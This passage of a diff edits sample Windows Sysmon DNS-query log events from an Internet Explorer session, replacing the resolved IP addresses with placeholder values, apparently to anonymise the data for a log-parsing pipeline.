t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "time_created": "2019-07-18T03:34:10.067Z", 
@@ -7602,7 +7602,7 @@
 "ProcessId": "2736",
 "QueryName": "ocsp.comodoca4.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:09.184"
 },
@@ -7651,7 +7651,7 @@
 "ProcessId": "2736",
 "QueryName": "sync.crwdcntrl.net",
 "QueryStatus": "0",
- "QueryResults": "type: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;",
+ "QueryResults": "type: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:09.322"
 },
@@ -7669,7 +7669,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7681,7 +7681,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7692,7 +7692,7 @@
 "event_data": {
 "QueryName": "match.sync.ad.cpe.dotomi.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;",
+ "QueryResults": "type: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:09.730",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -7723,7 +7723,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7755,7 +7755,7 @@ "ProcessId": "2736", "QueryName": "tps10230.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;" + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;" } }, "agent": { 
@@ -7772,7 +7772,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7800,7 +7800,7 @@ "ProcessId": "2736", "QueryName": "tps10221.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:10.650" }, 
@@ -7828,7 +7828,7 @@
 },
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "type: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:16.329",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -7852,7 +7852,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -7860,7 +7860,7 @@ { "@timestamp": "2021-05-05T15:30:51.712Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7884,7 +7884,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;", + "QueryResults": "type: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:16.386", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
